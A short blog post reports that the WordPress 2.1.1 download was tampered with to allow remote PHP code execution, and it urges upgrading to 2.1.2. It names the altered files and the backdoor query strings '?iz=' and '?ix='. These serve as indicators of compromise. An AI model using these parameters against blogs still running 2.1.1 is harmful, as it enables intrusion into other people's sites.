Agnivo Roy

About 3 to 4 days ago, a cracker is known to have gained access to the WordPress server and modified the then current WordPress release 2.1.1 to include a security exploit that enables remote PHP code execution. The issue was reported by a user to the WordPress team and they took the server down and went into further investigations.

The cracker gained user-level access to the server in some way but didn’t touch any file other than the latest 2.1.1 version, probably because it was the most wanted and downloaded version at that time. Only 2 files were modified that would allow remote php code to be executed.

The 2.1.1 archives downloaded prior to 4 days aren’t affected. But to be sure that you aren’t affected by chance, the WordPress team has released an updated version 2.1.2 which is completely clean and is devoid of all exploits. The WP team recommends full overwriting of all files while upgrading and if you find any blogs still running 2.1.1, drop a message to the owner.

The files modified seems to be “themes.php” and “feed.php” with exploited query strings : “?iz=” and “?ix=”. The WordPress team has set up a special email id for this problem : 21securityfaq [AT] wordpress.org Here’s the Official Post

As for myself, my 2.1.1 archive downloads were made about 6-7 days ago…So, I can skip upgrading for the time being…but don’t take chances like me, it’s serious !